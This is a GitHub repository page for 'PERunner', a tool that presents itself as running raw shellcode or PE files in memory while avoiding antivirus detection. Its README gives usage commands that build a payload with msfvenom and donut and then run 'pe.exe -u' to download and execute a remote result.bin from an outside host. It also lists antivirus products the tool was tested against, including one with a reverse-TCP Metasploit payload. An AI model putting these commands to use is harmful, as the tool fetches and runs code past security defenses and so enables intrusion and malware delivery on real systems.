Skip to content
/ pe-run Public

Runs RAW or PE file in memory, avoiding AV

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

lcn-m/pe-run

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
.gitignore
.gitignore
 
 
README.md
README.md
 
 
evalpe.py
evalpe.py
 
 
pe.py
pe.py
 
 
shellcoding.py
shellcoding.py
 
 

Repository files navigation

PERunner

Runs RAW or PE file in memory, avoiding AV. First generate RAW with shellcoding.py (Requires https://github.com/TheWover/donut in current directory). Example of usage:

python3 shellcoding.py -t msf -p 'msfvenom -a x86 --platform Windows -p windows/exec CMD="calc.exe" -f raw'

python3 shellcoding.py -t pe -p your_exe_not_in_golang.exe

Next run pe.exe with -u params and path the url to result.bin

pe.exe -u http://10.10.10.10/result.bin

Tested AV MSF_REV_TCP OWN PE
AVAST
ESET
DrWEB
360Sec
KASPERSKY ⬜️
AVG

About

Runs RAW or PE file in memory, avoiding AV

Topics

python memory pe av evasion bypass-av run-in-memory

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages